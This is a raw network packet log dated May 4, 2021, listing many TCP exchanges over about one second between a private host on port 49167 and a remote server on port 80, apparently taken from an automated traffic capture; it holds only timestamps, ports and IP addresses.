                                                  May 4, 2021 20:31:10.305617094 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.305634022 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.305640936 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.305656910 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.305659056 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.305680990 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.305681944 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.305701971 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.305710077 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.305723906 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.305731058 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.305746078 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.305749893 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.305768013 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.305771112 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.305789948 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.305804014 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.305808067 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.305824041 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.305830956 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.305843115 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.305854082 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.305866003 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.305876017 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.305883884 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.305897951 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.305922985 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.305941105 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.306634903 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.339422941 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.339483023 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.339622974 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.507145882 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.507178068 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.507252932 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.507297993 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.507599115 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.507623911 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.507641077 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.507658005 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.507702112 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.507719040 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.507740021 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.507744074 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.507766008 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.507785082 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.507788897 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.507816076 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.507827997 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.507848978 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.507869959 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.507891893 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.507915974 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.507922888 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.507939100 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.507961035 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.507982969 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.507983923 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.508004904 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.508028030 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.508052111 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.508074999 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.508100033 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.508102894 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.508116007 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.508121967 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.508124113 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.508146048 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.508152008 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.508169889 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.508193016 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.508198977 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.508213997 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.508233070 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.508238077 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.508250952 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.508275032 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.508295059 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.508311033 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.508320093 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.508342981 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.508361101 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.508364916 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.508388042 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.508402109 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.508410931 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.508433104 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.508446932 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.508490086 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.510126114 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.541599989 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.541661024 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.541699886 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.541714907 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.541747093 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.541760921 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.541764975 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.541806936 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.710489035 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.710527897 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.710542917 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.710556030 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.710716963 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.711745977 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.711770058 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.711787939 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.711803913 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.711818933 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.711821079 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.711843014 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.711847067 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.711849928 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.711859941 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.711885929 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.711890936 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.711909056 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.711929083 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.711929083 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.711946964 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.711961031 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.711975098 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.712320089 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.713758945 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.713783979 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.713800907 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.713818073 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.713833094 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.713835001 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.713846922 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.713850975 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.713865995 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.713870049 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.713872910 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.713902950 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.713915110 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.713929892 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.713932037 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.713944912 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.713949919 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.713967085 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.713969946 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.713984013 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.713988066 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.713999033 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.714000940 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.714015961 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.714018106 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.714031935 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.714039087 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.714047909 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.714057922 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.714073896 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.714075089 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.714088917 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.714092016 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.714104891 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.714109898 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.714121103 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.714127064 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.714143991 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.714148998 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.714160919 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.714162111 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.714178085 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.714181900 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.714193106 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.714200974 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.714216948 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.714217901 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.714231968 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.714235067 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.714247942 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.714252949 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.714270115 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.714271069 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.714286089 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.714286089 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.714299917 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.714303017 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.714313030 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.714334965 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.715059042 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.745182037 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.745210886 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.745230913 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.745254993 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.745270014 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.745393038 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.913146019 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.913225889 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.913264036 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.913300037 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.913424969 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.913467884 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.916220903 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.916291952 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.916331053 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.916367054 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.916368961 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.916384935 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.916426897 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.916446924 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.916465998 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.916475058 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.916529894 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.916779995 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.916820049 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.916846991 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.916866064 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.916868925 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.916908026 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.916929960 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.916954994 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.917171955 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.917213917 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.917237043 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.917253017 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.917269945 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.917289972 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.917301893 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.917330027 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.917341948 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.917366982 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.917367935 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.917416096 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.917445898 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.917495012 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.917500019 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.917536974 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.917556047 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.917574883 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.917581081 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.917613983 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.917624950 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.917651892 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.917665958 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.917689085 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.917694092 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.917727947 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.917737961 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.917752981 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.917768002 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.917795897 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.917800903 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.917841911 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.917855024 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.917886972 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.917907000 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.917953968 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.917956114 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.917998075 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.918009043 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.918035030 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.918039083 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.918072939 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.918083906 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.918112040 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.918112993 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.918148994 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.918163061 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.918188095 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.918201923 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.918225050 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.918255091 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.918272972 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.918318033 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.918323994 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.918328047 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.918354988 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.918370962 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.918392897 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.918421984 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.918431044 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.918431997 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.918482065 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.918853998 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.949103117 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.949148893 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.949196100 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.949242115 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.949279070 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.949316978 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.949354887 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.949357986 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.949423075 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.949450016 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.949455976 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.949474096 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.949479103 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.949513912 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.949520111 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.949553013 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.949558020 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.949594021 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.949599981 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.949645996 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950144053 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950185061 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950206041 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950232029 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950263023 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950273991 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950279951 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950311899 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950320959 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950350046 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950354099 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950387955 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950397015 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950423956 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950433969 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950462103 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950472116 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950499058 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950505018 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950542927 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950545073 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950587034 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950591087 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950623989 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950629950 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950661898 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950666904 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950699091 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950709105 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950731039 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950736046 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950771093 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950773001 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950778961 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950810909 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950820923 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950859070 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950865984 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950901031 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950905085 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950948000 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950956106 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950994968 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.951000929 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.951034069 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.951036930 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.951070070 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.951078892 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.951111078 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.951122046 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.951148987 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.951159000 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.951193094 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.951195955 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.951236963 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.951242924 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.951273918 CEST804916752.218.240.113192.168.2.22
